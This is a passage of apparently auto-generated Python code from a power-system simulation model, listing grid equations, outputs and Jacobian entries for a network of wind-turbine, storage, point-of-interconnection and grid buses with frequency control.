struct[0].g[22,0] = K_p_GRID*(-i_d_GRID*(R_v_GRID*i_d_GRID + V_GRID*sin(delta_GRID - theta_GRID)) - i_q_GRID*(R_v_GRID*i_q_GRID + V_GRID*cos(delta_GRID - theta_GRID)) + p_m_GRID + xi_p_GRID/T_p_GRID) - omega_GRID + 1
struct[0].g[23,0] = -R_v_GRID*i_d_GRID - V_GRID*sin(delta_GRID - theta_GRID) + X_v_GRID*i_q_GRID
struct[0].g[24,0] = -R_v_GRID*i_q_GRID - V_GRID*cos(delta_GRID - theta_GRID) - X_v_GRID*i_d_GRID + e_qv_GRID
struct[0].g[25,0] = V_GRID*i_d_GRID*sin(delta_GRID - theta_GRID) + V_GRID*i_q_GRID*cos(delta_GRID - theta_GRID) - p_g_GRID
struct[0].g[26,0] = V_GRID*i_d_GRID*cos(delta_GRID - theta_GRID) - V_GRID*i_q_GRID*sin(delta_GRID - theta_GRID) - q_g_GRID
struct[0].g[27,0] = K_sec_GRID*p_agc + p_c_GRID - p_m_GRID - (omega_GRID - omega_ref_GRID)/Droop_GRID
struct[0].g[29,0] = K_i_agc*xi_freq + K_p_agc*(1 - omega_coi) - p_agc
# Outputs:
if mode == 3:
struct[0].h[0,0] = V_W1lv
struct[0].h[1,0] = V_W2lv
struct[0].h[2,0] = V_W3lv
struct[0].h[3,0] = V_STlv
struct[0].h[4,0] = V_W1mv
struct[0].h[5,0] = V_W2mv
struct[0].h[6,0] = V_W3mv
struct[0].h[7,0] = V_POImv
struct[0].h[8,0] = V_STmv
struct[0].h[9,0] = V_POI
struct[0].h[10,0] = V_GRID
struct[0].h[11,0] = i_d_GRID*(R_v_GRID*i_d_GRID + V_GRID*sin(delta_GRID - theta_GRID)) + i_q_GRID*(R_v_GRID*i_q_GRID + V_GRID*cos(delta_GRID - theta_GRID))
if mode == 10:
struct[0].Fx_ini[0,0] = -K_delta_GRID
struct[0].Fx_ini[1,0] = -V_GRID*i_d_GRID*cos(delta_GRID - theta_GRID) + V_GRID*i_q_GRID*sin(delta_GRID - theta_GRID)
struct[0].Fx_ini[2,2] = -1/T_v_GRID
if mode == 11:
struct[0].Fy_ini[0,22] = Omega_b_GRID
struct[0].Fy_ini[0,28] = -Omega_b_GRID
struct[0].Fy_ini[1,20] = -i_d_GRID*sin(delta_GRID - theta_GRID) - i_q_GRID*cos(delta_GRID - theta_GRID)
struct[0].Fy_ini[1,21] = V_GRID*i_d_GRID*cos(delta_GRID - theta_GRID) - V_GRID*i_q_GRID*sin(delta_GRID - theta_GRID)
struct[0].Fy_ini[1,23] = -2*R_v_GRID*i_d_GRID - V_GRID*sin(delta_GRID - theta_GRID)
struct[0].Fy_ini[1,24] = -2*R_v_GRID*i_q_GRID - V_GRID*cos(delta_GRID - theta_GRID)
struct[0].Fy_ini[1,27] = 1
struct[0].Fy_ini[2,26] = -K_q_GRID/T_v_GRID
struct[0].Fy_ini[3,28] = -1
struct[0].Gx_ini[22,0] = K_p_GRID*(-V_GRID*i_d_GRID*cos(delta_GRID - theta_GRID) + V_GRID*i_q_GRID*sin(delta_GRID - theta_GRID))
struct[0].Gx_ini[22,1] = K_p_GRID/T_p_GRID
struct[0].Gx_ini[23,0] = -V_GRID*cos(delta_GRID - theta_GRID)
struct[0].Gx_ini[24,0] = V_GRID*sin(delta_GRID - theta_GRID)
struct[0].Gx_ini[24,2] = 1
struct[0].Gx_ini[25,0] = V_GRID*i_d_GRID*cos(delta_GRID - theta_GRID) - V_GRID*i_q_GRID*sin(delta_GRID - theta_GRID)
struct[0].Gx_ini[26,0] = -V_GRID*i_d_GRID*sin(delta_GRID - theta_GRID) - V_GRID*i_q_GRID*cos(delta_GRID - theta_GRID)
struct[0].Gx_ini[29,3] = K_i_agc
struct[0].Gy_ini[0,0] = 2*V_W1lv*g_W1mv_W1lv + V_W1mv*(-b_W1mv_W1lv*sin(theta_W1lv - theta_W1mv) - g_W1mv_W1lv*cos(theta_W1lv - theta_W1mv))
struct[0].Gy_ini[0,1] = V_W1lv*V_W1mv*(-b_W1mv_W1lv*cos(theta_W1lv - theta_W1mv) + g_W1mv_W1lv*sin(theta_W1lv - theta_W1mv))
struct[0].Gy_ini[0,8] = V_W1lv*(-b_W1mv_W1lv*sin(theta_W1lv - theta_W1mv) - g_W1mv_W1lv*cos(theta_W1lv - theta_W1mv))
struct[0].Gy_ini[0,9] = V_W1lv*V_W1mv*(b_W1mv_W1lv*cos(theta_W1lv - theta_W1mv) - g_W1mv_W1lv*sin(theta_W1lv - theta_W1mv))
struct[0].Gy_ini[1,0] = 2*V_W1lv*(-b_W1mv_W1lv - bs_W1mv_W1lv/2) + V_W1mv*(b_W1mv_W1lv*cos(theta_W1lv - theta_W1mv) - g_W1mv_W1lv*sin(theta_W1lv - theta_W1mv))
struct[0].Gy_ini[1,1] = V_W1lv*V_W1mv*(-b_W1mv_W1lv*sin(theta_W1lv - theta_W1mv) - g_W1mv_W1lv*cos(theta_W1lv - theta_W1mv))
struct[0].Gy_ini[1,8] = V_W1lv*(b_W1mv_W1lv*cos(theta_W1lv - theta_W1mv) - g_W1mv_W1lv*sin(theta_W1lv - theta_W1mv))
struct[0].Gy_ini[1,9] = V_W1lv*V_W1mv*(b_W1mv_W1lv*sin(theta_W1lv - theta_W1mv) + g_W1mv_W1lv*cos(theta_W1lv - theta_W1mv))
struct[0].Gy_ini[2,2] = 2*V_W2lv*g_W2mv_W2lv + V_W2mv*(-b_W2mv_W2lv*sin(theta_W2lv - theta_W2mv) - g_W2mv_W2lv*cos(theta_W2lv - theta_W2mv))
struct[0].Gy_ini[2,3] = V_W2lv*V_W2mv*(-b_W2mv_W2lv*cos(theta_W2lv - theta_W2mv) + g_W2mv_W2lv*sin(theta_W2lv - theta_W2mv))
struct[0].Gy_ini[2,10] = V_W2lv*(-b_W2mv_W2lv*sin(theta_W2lv - theta_W2mv) - g_W2mv_W2lv*cos(theta_W2lv - theta_W2mv))
struct[0].Gy_ini[2,11] = V_W2lv*V_W2mv*(b_W2mv_W2lv*cos(theta_W2lv - theta_W2mv) - g_W2mv_W2lv*sin(theta_W2lv - theta_W2mv))
struct[0].Gy_ini[3,2] = 2*V_W2lv*(-b_W2mv_W2lv - bs_W2mv_W2lv/2) + V_W2mv*(b_W2mv_W2lv*cos(theta_W2lv - theta_W2mv) - g_W2mv_W2lv*sin(theta_W2lv - theta_W2mv))
struct[0].Gy_ini[3,3] = V_W2lv*V_W2mv*(-b_W2mv_W2lv*sin(theta_W2lv - theta_W2mv) - g_W2mv_W2lv*cos(theta_W2lv - theta_W2mv))
struct[0].Gy_ini[3,10] = V_W2lv*(b_W2mv_W2lv*cos(theta_W2lv - theta_W2mv) - g_W2mv_W2lv*sin(theta_W2lv - theta_W2mv))
struct[0].Gy_ini[3,11] = V_W2lv*V_W2mv*(b_W2mv_W2lv*sin(theta_W2lv - theta_W2mv) + g_W2mv_W2lv*cos(theta_W2lv - theta_W2mv))
struct[0].Gy_ini[4,4] = 2*V_W3lv*g_W3mv_W3lv + V_W3mv*(-b_W3mv_W3lv*sin(theta_W3lv - theta_W3mv) - g_W3mv_W3lv*cos(theta_W3lv - theta_W3mv))
struct[0].Gy_ini[4,5] = V_W3lv*V_W3mv*(-b_W3mv_W3lv*cos(theta_W3lv - theta_W3mv) + g_W3mv_W3lv*sin(theta_W3lv - theta_W3mv))
struct[0].Gy_ini[4,12] = V_W3lv*(-b_W3mv_W3lv*sin(theta_W3lv - theta_W3mv) - g_W3mv_W3lv*cos(theta_W3lv - theta_W3mv))
struct[0].Gy_ini[4,13] = V_W3lv*V_W3mv*(b_W3mv_W3lv*cos(theta_W3lv - theta_W3mv) - g_W3mv_W3lv*sin(theta_W3lv - theta_W3mv))
struct[0].Gy_ini[5,4] = 2*V_W3lv*(-b_W3mv_W3lv - bs_W3mv_W3lv/2) + V_W3mv*(b_W3mv_W3lv*cos(theta_W3lv - theta_W3mv) - g_W3mv_W3lv*sin(theta_W3lv - theta_W3mv))
struct[0].Gy_ini[5,5] = V_W3lv*V_W3mv*(-b_W3mv_W3lv*sin(theta_W3lv - theta_W3mv) - g_W3mv_W3lv*cos(theta_W3lv - theta_W3mv))
struct[0].Gy_ini[5,12] = V_W3lv*(b_W3mv_W3lv*cos(theta_W3lv - theta_W3mv) - g_W3mv_W3lv*sin(theta_W3lv - theta_W3mv))
struct[0].Gy_ini[5,13] = V_W3lv*V_W3mv*(b_W3mv_W3lv*sin(theta_W3lv - theta_W3mv) + g_W3mv_W3lv*cos(theta_W3lv - theta_W3mv))
struct[0].Gy_ini[6,6] = 2*V_STlv*g_STmv_STlv + V_STmv*(-b_STmv_STlv*sin(theta_STlv - theta_STmv) - g_STmv_STlv*cos(theta_STlv - theta_STmv))
struct[0].Gy_ini[6,7] = V_STlv*V_STmv*(-b_STmv_STlv*cos(theta_STlv - theta_STmv) + g_STmv_STlv*sin(theta_STlv - theta_STmv))
struct[0].Gy_ini[6,16] = V_STlv*(-b_STmv_STlv*sin(theta_STlv - theta_STmv) - g_STmv_STlv*cos(theta_STlv - theta_STmv))
struct[0].Gy_ini[6,17] = V_STlv*V_STmv*(b_STmv_STlv*cos(theta_STlv - theta_STmv) - g_STmv_STlv*sin(theta_STlv - theta_STmv))
struct[0].Gy_ini[7,6] = 2*V_STlv*(-b_STmv_STlv - bs_STmv_STlv/2) + V_STmv*(b_STmv_STlv*cos(theta_STlv - theta_STmv) - g_STmv_STlv*sin(theta_STlv - theta_STmv))
struct[0].Gy_ini[7,7] = V_STlv*V_STmv*(-b_STmv_STlv*sin(theta_STlv - theta_STmv) - g_STmv_STlv*cos(theta_STlv - theta_STmv))
struct[0].Gy_ini[7,16] = V_STlv*(b_STmv_STlv*cos(theta_STlv - theta_STmv) - g_STmv_STlv*sin(theta_STlv - theta_STmv))
struct[0].Gy_ini[7,17] = V_STlv*V_STmv*(b_STmv_STlv*sin(theta_STlv - theta_STmv) + g_STmv_STlv*cos(theta_STlv - theta_STmv))
struct[0].Gy_ini[8,0] = V_W1mv*(b_W1mv_W1lv*sin(theta_W1lv - theta_W1mv) - g_W1mv_W1lv*cos(theta_W1lv - theta_W1mv))
struct[0].Gy_ini[8,1] = V_W1lv*V_W1mv*(b_W1mv_W1lv*cos(theta_W1lv - theta_W1mv) + g_W1mv_W1lv*sin(theta_W1lv - theta_W1mv))
struct[0].Gy_ini[8,8] = V_W1lv*(b_W1mv_W1lv*sin(theta_W1lv - theta_W1mv) - g_W1mv_W1lv*cos(theta_W1lv - theta_W1mv)) + 2*V_W1mv*(g_W1mv_W1lv + g_W1mv_W2mv) + V_W2mv*(-b_W1mv_W2mv*sin(theta_W1mv - theta_W2mv) - g_W1mv_W2mv*cos(theta_W1mv - theta_W2mv))
struct[0].Gy_ini[8,9] = V_W1lv*V_W1mv*(-b_W1mv_W1lv*cos(theta_W1lv - theta_W1mv) - g_W1mv_W1lv*sin(theta_W1lv - theta_W1mv)) + V_W1mv*V_W2mv*(-b_W1mv_W2mv*cos(theta_W1mv - theta_W2mv) + g_W1mv_W2mv*sin(theta_W1mv - theta_W2mv))
struct[0].Gy_ini[8,10] = V_W1mv*(-b_W1mv_W2mv*sin(theta_W1mv - theta_W2mv) - g_W1mv_W2mv*cos(theta_W1mv - theta_W2mv))
struct[0].Gy_ini[8,11] = V_W1mv*V_W2mv*(b_W1mv_W2mv*cos(theta_W1mv - theta_W2mv) - g_W1mv_W2mv*sin(theta_W1mv - theta_W2mv))
struct[0].Gy_ini[9,0] = V_W1mv*(b_W1mv_W1lv*cos(theta_W1lv - theta_W1mv) + g_W1mv_W1lv*sin(theta_W1lv - theta_W1mv))
struct[0].Gy_ini[9,1] = V_W1lv*V_W1mv*(-b_W1mv_W1lv*sin(theta_W1lv - theta_W1mv) + g_W1mv_W1lv*cos(theta_W1lv - theta_W1mv))
struct[0].Gy_ini[9,8] = V_W1lv*(b_W1mv_W1lv*cos(theta_W1lv - theta_W1mv) + g_W1mv_W1lv*sin(theta_W1lv - theta_W1mv)) + 2*V_W1mv*(-b_W1mv_W1lv - b_W1mv_W2mv - bs_W1mv_W1lv/2 - bs_W1mv_W2mv/2) + V_W2mv*(b_W1mv_W2mv*cos(theta_W1mv - theta_W2mv) - g_W1mv_W2mv*sin(theta_W1mv - theta_W2mv))
struct[0].Gy_ini[9,9] = V_W1lv*V_W1mv*(b_W1mv_W1lv*sin(theta_W1lv - theta_W1mv) - g_W1mv_W1lv*cos(theta_W1lv - theta_W1mv)) + V_W1mv*V_W2mv*(-b_W1mv_W2mv*sin(theta_W1mv - theta_W2mv) - g_W1mv_W2mv*cos(theta_W1mv - theta_W2mv))
struct[0].Gy_ini[9,10] = V_W1mv*(b_W1mv_W2mv*cos(theta_W1mv - theta_W2mv) - g_W1mv_W2mv*sin(theta_W1mv - theta_W2mv))
struct[0].Gy_ini[9,11] = V_W1mv*V_W2mv*(b_W1mv_W2mv*sin(theta_W1mv - theta_W2mv) + g_W1mv_W2mv*cos(theta_W1mv - theta_W2mv))
struct[0].Gy_ini[10,2] = V_W2mv*(b_W2mv_W2lv*sin(theta_W2lv - theta_W2mv) - g_W2mv_W2lv*cos(theta_W2lv - theta_W2mv))
struct[0].Gy_ini[10,3] = V_W2lv*V_W2mv*(b_W2mv_W2lv*cos(theta_W2lv - theta_W2mv) + g_W2mv_W2lv*sin(theta_W2lv - theta_W2mv))
struct[0].Gy_ini[10,8] = V_W2mv*(b_W1mv_W2mv*sin(theta_W1mv - theta_W2mv) - g_W1mv_W2mv*cos(theta_W1mv - theta_W2mv))
struct[0].Gy_ini[10,9] = V_W1mv*V_W2mv*(b_W1mv_W2mv*cos(theta_W1mv - theta_W2mv) + g_W1mv_W2mv*sin(theta_W1mv - theta_W2mv))
struct[0].Gy_ini[10,10] = V_W1mv*(b_W1mv_W2mv*sin(theta_W1mv - theta_W2mv) - g_W1mv_W2mv*cos(theta_W1mv - theta_W2mv)) + V_W2lv*(b_W2mv_W2lv*sin(theta_W2lv - theta_W2mv) - g_W2mv_W2lv*cos(theta_W2lv - theta_W2mv)) + 2*V_W2mv*(g_W1mv_W2mv + g_W2mv_W2lv + g_W2mv_W3mv) + V_W3mv*(-b_W2mv_W3mv*sin(theta_W2mv - theta_W3mv) - g_W2mv_W3mv*cos(theta_W2mv - theta_W3mv))
struct[0].Gy_ini[10,11] = V_W1mv*V_W2mv*(-b_W1mv_W2mv*cos(theta_W1mv - theta_W2mv) - g_W1mv_W2mv*sin(theta_W1mv - theta_W2mv)) + V_W2lv*V_W2mv*(-b_W2mv_W2lv*cos(theta_W2lv - theta_W2mv) - g_W2mv_W2lv*sin(theta_W2lv - theta_W2mv)) + V_W2mv*V_W3mv*(-b_W2mv_W3mv*cos(theta_W2mv - theta_W3mv) + g_W2mv_W3mv*sin(theta_W2mv - theta_W3mv))
struct[0].Gy_ini[10,12] = V_W2mv*(-b_W2mv_W3mv*sin(theta_W2mv - theta_W3mv) - g_W2mv_W3mv*cos(theta_W2mv - theta_W3mv))
struct[0].Gy_ini[10,13] = V_W2mv*V_W3mv*(b_W2mv_W3mv*cos(theta_W2mv - theta_W3mv) - g_W2mv_W3mv*sin(theta_W2mv - theta_W3mv))
struct[0].Gy_ini[11,2] = V_W2mv*(b_W2mv_W2lv*cos(theta_W2lv - theta_W2mv) + g_W2mv_W2lv*sin(theta_W2lv - theta_W2mv))
struct[0].Gy_ini[11,3] = V_W2lv*V_W2mv*(-b_W2mv_W2lv*sin(theta_W2lv - theta_W2mv) + g_W2mv_W2lv*cos(theta_W2lv - theta_W2mv))
struct[0].Gy_ini[11,8] = V_W2mv*(b_W1mv_W2mv*cos(theta_W1mv - theta_W2mv) + g_W1mv_W2mv*sin(theta_W1mv - theta_W2mv))
struct[0].Gy_ini[11,9] = V_W1mv*V_W2mv*(-b_W1mv_W2mv*sin(theta_W1mv - theta_W2mv) + g_W1mv_W2mv*cos(theta_W1mv - theta_W2mv))
struct[0].Gy_ini[11,10] = V_W1mv*(b_W1mv_W2mv*cos(theta_W1mv - theta_W2mv) + g_W1mv_W2mv*sin(theta_W1mv - theta_W2mv)) + V_W2lv*(b_W2mv_W2lv*cos(theta_W2lv - theta_W2mv) + g_W2mv_W2lv*sin(theta_W2lv - theta_W2mv)) + 2*V_W2mv*(-b_W1mv_W2mv - b_W2mv_W2lv - b_W2mv_W3mv - bs_W1mv_W2mv/2 - bs_W2mv_W2lv/2 - bs_W2mv_W3mv/2) + V_W3mv*(b_W2mv_W3mv*cos(theta_W2mv - theta_W3mv) - g_W2mv_W3mv*sin(theta_W2mv - theta_W3mv))
struct[0].Gy_ini[11,11] = V_W1mv*V_W2mv*(b_W1mv_W2mv*sin(theta_W1mv - theta_W2mv) - g_W1mv_W2mv*cos(theta_W1mv - theta_W2mv)) + V_W2lv*V_W2mv*(b_W2mv_W2lv*sin(theta_W2lv - theta_W2mv) - g_W2mv_W2lv*cos(theta_W2lv - theta_W2mv)) + V_W2mv*V_W3mv*(-b_W2mv_W3mv*sin(theta_W2mv - theta_W3mv) - g_W2mv_W3mv*cos(theta_W2mv - theta_W3mv))
struct[0].Gy_ini[11,12] = V_W2mv*(b_W2mv_W3mv*cos(theta_W2mv - theta_W3mv) - g_W2mv_W3mv*sin(theta_W2mv - theta_W3mv))
struct[0].Gy_ini[11,13] = V_W2mv*V_W3mv*(b_W2mv_W3mv*sin(theta_W2mv - theta_W3mv) + g_W2mv_W3mv*cos(theta_W2mv - theta_W3mv))
struct[0].Gy_ini[12,4] = V_W3mv*(b_W3mv_W3lv*sin(theta_W3lv - theta_W3mv) - g_W3mv_W3lv*cos(theta_W3lv - theta_W3mv))
struct[0].Gy_ini[12,5] = V_W3lv*V_W3mv*(b_W3mv_W3lv*cos(theta_W3lv - theta_W3mv) + g_W3mv_W3lv*sin(theta_W3lv - theta_W3mv))
struct[0].Gy_ini[12,10] = V_W3mv*(b_W2mv_W3mv*sin(theta_W2mv - theta_W3mv) - g_W2mv_W3mv*cos(theta_W2mv - theta_W3mv))
struct[0].Gy_ini[12,11] = V_W2mv*V_W3mv*(b_W2mv_W3mv*cos(theta_W2mv - theta_W3mv) + g_W2mv_W3mv*sin(theta_W2mv - theta_W3mv))
struct[0].Gy_ini[12,12] = V_POImv*(b_W3mv_POImv*sin(theta_POImv - theta_W3mv) - g_W3mv_POImv*cos(theta_POImv - theta_W3mv)) + V_W2mv*(b_W2mv_W3mv*sin(theta_W2mv - theta_W3mv) - g_W2mv_W3mv*cos(theta_W2mv - theta_W3mv)) + V_W3lv*(b_W3mv_W3lv*sin(theta_W3lv - theta_W3mv) - g_W3mv_W3lv*cos(theta_W3lv - theta_W3mv)) + 2*V_W3mv*(g_W2mv_W3mv + g_W3mv_POImv + g_W3mv_W3lv)
struct[0].Gy_ini[12,13] = V_POImv*V_W3mv*(-b_W3mv_POImv*cos(theta_POImv - theta_W3mv) - g_W3mv_POImv*sin(theta_POImv - theta_W3mv)) + V_W2mv*V_W3mv*(-b_W2mv_W3mv*cos(theta_W2mv - theta_W3mv) - g_W2mv_W3mv*sin(theta_W2mv - theta_W3mv)) + V_W3lv*V_W3mv*(-b_W3mv_W3lv*cos(theta_W3lv - theta_W3mv) - g_W3mv_W3lv*sin(theta_W3lv - theta_W3mv))
struct[0].Gy_ini[12,14] = V_W3mv*(b_W3mv_POImv*sin(theta_POImv - theta_W3mv) - g_W3mv_POImv*cos(theta_POImv - theta_W3mv))
struct[0].Gy_ini[12,15] = V_POImv*V_W3mv*(b_W3mv_POImv*cos(theta_POImv - theta_W3mv) + g_W3mv_POImv*sin(theta_POImv - theta_W3mv))
struct[0].Gy_ini[13,4] = V_W3mv*(b_W3mv_W3lv*cos(theta_W3lv - theta_W3mv) + g_W3mv_W3lv*sin(theta_W3lv - theta_W3mv))
struct[0].Gy_ini[13,5] = V_W3lv*V_W3mv*(-b_W3mv_W3lv*sin(theta_W3lv - theta_W3mv) + g_W3mv_W3lv*cos(theta_W3lv - theta_W3mv))
struct[0].Gy_ini[13,10] = V_W3mv*(b_W2mv_W3mv*cos(theta_W2mv - theta_W3mv) + g_W2mv_W3mv*sin(theta_W2mv - theta_W3mv))
struct[0].Gy_ini[13,11] = V_W2mv*V_W3mv*(-b_W2mv_W3mv*sin(theta_W2mv - theta_W3mv) + g_W2mv_W3mv*cos(theta_W2mv - theta_W3mv))
struct[0].Gy_ini[13,12] = V_POImv*(b_W3mv_POImv*cos(theta_POImv - theta_W3mv) + g_W3mv_POImv*sin(theta_POImv - theta_W3mv)) + V_W2mv*(b_W2mv_W3mv*cos(theta_W2mv - theta_W3mv) + g_W2mv_W3mv*sin(theta_W2mv - theta_W3mv)) + V_W3lv*(b_W3mv_W3lv*cos(theta_W3lv - theta_W3mv) + g_W3mv_W3lv*sin(theta_W3lv - theta_W3mv)) + 2*V_W3mv*(-b_W2mv_W3mv - b_W3mv_POImv - b_W3mv_W3lv - bs_W2mv_W3mv/2 - bs_W3mv_POImv/2 - bs_W3mv_W3lv/2)
struct[0].Gy_ini[13,13] = V_POImv*V_W3mv*(b_W3mv_POImv*sin(theta_POImv - theta_W3mv) - g_W3mv_POImv*cos(theta_POImv - theta_W3mv)) + V_W2mv*V_W3mv*(b_W2mv_W3mv*sin(theta_W2mv - theta_W3mv) - g_W2mv_W3mv*cos(theta_W2mv - theta_W3mv)) + V_W3lv*V_W3mv*(b_W3mv_W3lv*sin(theta_W3lv - theta_W3mv) - g_W3mv_W3lv*cos(theta_W3lv - theta_W3mv))
struct[0].Gy_ini[13,14] = V_W3mv*(b_W3mv_POImv*cos(theta_POImv - theta_W3mv) + g_W3mv_POImv*sin(theta_POImv - theta_W3mv))
struct[0].Gy_ini[13,15] = V_POImv*V_W3mv*(-b_W3mv_POImv*sin(theta_POImv - theta_W3mv) + g_W3mv_POImv*cos(theta_POImv - theta_W3mv))
struct[0].Gy_ini[14,12] = V_POImv*(-b_W3mv_POImv*sin(theta_POImv - theta_W3mv) - g_W3mv_POImv*cos(theta_POImv - theta_W3mv))
struct[0].Gy_ini[14,13] = V_POImv*V_W3mv*(b_W3mv_POImv*cos(theta_POImv - theta_W3mv) - g_W3mv_POImv*sin(theta_POImv - theta_W3mv))
struct[0].Gy_ini[14,14] = V_POI*(b_POI_POImv*sin(theta_POI - theta_POImv) - g_POI_POImv*cos(theta_POI - theta_POImv)) + 2*V_POImv*(g_POI_POImv + g_STmv_POImv + g_W3mv_POImv) + V_STmv*(-b_STmv_POImv*sin(theta_POImv - theta_STmv) - g_STmv_POImv*cos(theta_POImv - theta_STmv)) + V_W3mv*(-b_W3mv_POImv*sin(theta_POImv - theta_W3mv) - g_W3mv_POImv*cos(theta_POImv - theta_W3mv))
struct[0].Gy_ini[14,15] = V_POI*V_POImv*(-b_POI_POImv*cos(theta_POI - theta_POImv) - g_POI_POImv*sin(theta_POI - theta_POImv)) + V_POImv*V_STmv*(-b_STmv_POImv*cos(theta_POImv - theta_STmv) + g_STmv_POImv*sin(theta_POImv - theta_STmv)) + V_POImv*V_W3mv*(-b_W3mv_POImv*cos(theta_POImv - theta_W3mv) + g_W3mv_POImv*sin(theta_POImv - theta_W3mv))
struct[0].Gy_ini[14,16] = V_POImv*(-b_STmv_POImv*sin(theta_POImv - theta_STmv) - g_STmv_POImv*cos(theta_POImv - theta_STmv))
struct[0].Gy_ini[14,17] = V_POImv*V_STmv*(b_STmv_POImv*cos(theta_POImv - theta_STmv) - g_STmv_POImv*sin(theta_POImv - theta_STmv))
struct[0].Gy_ini[14,18] = V_POImv*(b_POI_POImv*sin(theta_POI - theta_POImv) - g_POI_POImv*cos(theta_POI - theta_POImv))
struct[0].Gy_ini[14,19] = V_POI*V_POImv*(b_POI_POImv*cos(theta_POI - theta_POImv) + g_POI_POImv*sin(theta_POI - theta_POImv))
struct[0].Gy_ini[15,12] = V_POImv*(b_W3mv_POImv*cos(theta_POImv - theta_W3mv) - g_W3mv_POImv*sin(theta_POImv - theta_W3mv))
struct[0].Gy_ini[15,13] = V_POImv*V_W3mv*(b_W3mv_POImv*sin(theta_POImv - theta_W3mv) + g_W3mv_POImv*cos(theta_POImv - theta_W3mv))
struct[0].Gy_ini[15,14] = V_POI*(b_POI_POImv*cos(theta_POI - theta_POImv) + g_POI_POImv*sin(theta_POI - theta_POImv)) + 2*V_POImv*(-b_POI_POImv - b_STmv_POImv - b_W3mv_POImv - bs_POI_POImv/2 - bs_STmv_POImv/2 - bs_W3mv_POImv/2) + V_STmv*(b_STmv_POImv*cos(theta_POImv - theta_STmv) - g_STmv_POImv*sin(theta_POImv - theta_STmv)) + V_W3mv*(b_W3mv_POImv*cos(theta_POImv - theta_W3mv) - g_W3mv_POImv*sin(theta_POImv - theta_W3mv))
struct[0].Gy_ini[15,15] = V_POI*V_POImv*(b_POI_POImv*sin(theta_POI - theta_POImv) - g_POI_POImv*cos(theta_POI - theta_POImv)) + V_POImv*V_STmv*(-b_STmv_POImv*sin(theta_POImv - theta_STmv) - g_STmv_POImv*cos(theta_POImv - theta_STmv)) + V_POImv*V_W3mv*(-b_W3mv_POImv*sin(theta_POImv - theta_W3mv) - g_W3mv_POImv*cos(theta_POImv - theta_W3mv))
struct[0].Gy_ini[15,16] = V_POImv*(b_STmv_POImv*cos(theta_POImv - theta_STmv) - g_STmv_POImv*sin(theta_POImv - theta_STmv))
struct[0].Gy_ini[15,17] = V_POImv*V_STmv*(b_STmv_POImv*sin(theta_POImv - theta_STmv) + g_STmv_POImv*cos(theta_POImv - theta_STmv))
struct[0].Gy_ini[15,18] = V_POImv*(b_POI_POImv*cos(theta_POI - theta_POImv) + g_POI_POImv*sin(theta_POI - theta_POImv))
struct[0].Gy_ini[15,19] = V_POI*V_POImv*(-b_POI_POImv*sin(theta_POI - theta_POImv) + g_POI_POImv*cos(theta_POI - theta_POImv))
struct[0].Gy_ini[16,6] = V_STmv*(b_STmv_STlv*sin(theta_STlv - theta_STmv) - g_STmv_STlv*cos(theta_STlv - theta_STmv))
struct[0].Gy_ini[16,7] = V_STlv*V_STmv*(b_STmv_STlv*cos(theta_STlv - theta_STmv) + g_STmv_STlv*sin(theta_STlv - theta_STmv))
struct[0].Gy_ini[16,14] = V_STmv*(b_STmv_POImv*sin(theta_POImv - theta_STmv) - g_STmv_POImv*cos(theta_POImv - theta_STmv))
struct[0].Gy_ini[16,15] = V_POImv*V_STmv*(b_STmv_POImv*cos(theta_POImv - theta_STmv) + g_STmv_POImv*sin(theta_POImv - theta_STmv))
struct[0].Gy_ini[16,16] = V_POImv*(b_STmv_POImv*sin(theta_POImv - theta_STmv) - g_STmv_POImv*cos(theta_POImv - theta_STmv)) + V_STlv*(b_STmv_STlv*sin(theta_STlv - theta_STmv) - g_STmv_STlv*cos(theta_STlv - theta_STmv)) + 2*V_STmv*(g_STmv_POImv + g_STmv_STlv)
struct[0].Gy_ini[16,17] = V_POImv*V_STmv*(-b_STmv_POImv*cos(theta_POImv - theta_STmv) - g_STmv_POImv*sin(theta_POImv - theta_STmv)) + V_STlv*V_STmv*(-b_STmv_STlv*cos(theta_STlv - theta_STmv) - g_STmv_STlv*sin(theta_STlv - theta_STmv))
struct[0].Gy_ini[17,6] = V_STmv*(b_STmv_STlv*cos(theta_STlv - theta_STmv) + g_STmv_STlv*sin(theta_STlv - theta_STmv))
struct[0].Gy_ini[17,7] = V_STlv*V_STmv*(-b_STmv_STlv*sin(theta_STlv - theta_STmv) + g_STmv_STlv*cos(theta_STlv - theta_STmv))
struct[0].Gy_ini[17,14] = V_STmv*(b_STmv_POImv*cos(theta_POImv - theta_STmv) + g_STmv_POImv*sin(theta_POImv - theta_STmv))
struct[0].Gy_ini[17,15] = V_POImv*V_STmv*(-b_STmv_POImv*sin(theta_POImv - theta_STmv) + g_STmv_POImv*cos(theta_POImv - theta_STmv))
struct[0].Gy_ini[17,16] = V_POImv*(b_STmv_POImv*cos(theta_POImv - theta_STmv) + g_STmv_POImv*sin(theta_POImv - theta_STmv)) + V_STlv*(b_STmv_STlv*cos(theta_STlv - theta_STmv) + g_STmv_STlv*sin(theta_STlv - theta_STmv)) + 2*V_STmv*(-b_STmv_POImv - b_STmv_STlv - bs_STmv_POImv/2 - bs_STmv_STlv/2)
struct[0].Gy_ini[17,17] = V_POImv*V_STmv*(b_STmv_POImv*sin(theta_POImv - theta_STmv) - g_STmv_POImv*cos(theta_POImv - theta_STmv)) + V_STlv*V_STmv*(b_STmv_STlv*sin(theta_STlv - theta_STmv) - g_STmv_STlv*cos(theta_STlv - theta_STmv))
struct[0].Gy_ini[18,14] = V_POI*(-b_POI_POImv*sin(theta_POI - theta_POImv) - g_POI_POImv*cos(theta_POI - theta_POImv))
struct[0].Gy_ini[18,15] = V_POI*V_POImv*(b_POI_POImv*cos(theta_POI - theta_POImv) - g_POI_POImv*sin(theta_POI - theta_POImv))
struct[0].Gy_ini[18,18] = V_GRID*(b_POI_GRID*sin(theta_GRID - theta_POI) - g_POI_GRID*cos(theta_GRID - theta_POI)) + 2*V_POI*(g_POI_GRID + g_POI_POImv) + V_POImv*(-b_POI_POImv*sin(theta_POI - theta_POImv) - g_POI_POImv*cos(theta_POI - theta_POImv))
struct[0].Gy_ini[18,19] = V_GRID*V_POI*(-b_POI_GRID*cos(theta_GRID - theta_POI) - g_POI_GRID*sin(theta_GRID - theta_POI)) + V_POI*V_POImv*(-b_POI_POImv*cos(theta_POI - theta_POImv) + g_POI_POImv*sin(theta_POI - theta_POImv))
struct[0].Gy_ini[18,20] = V_POI*(b_POI_GRID*sin(theta_GRID - theta_POI) - g_POI_GRID*cos(theta_GRID - theta_POI))
struct[0].Gy_ini[18,21] = V_GRID*V_POI*(b_POI_GRID*cos(theta_GRID - theta_POI) + g_POI_GRID*sin(theta_GRID - theta_POI))
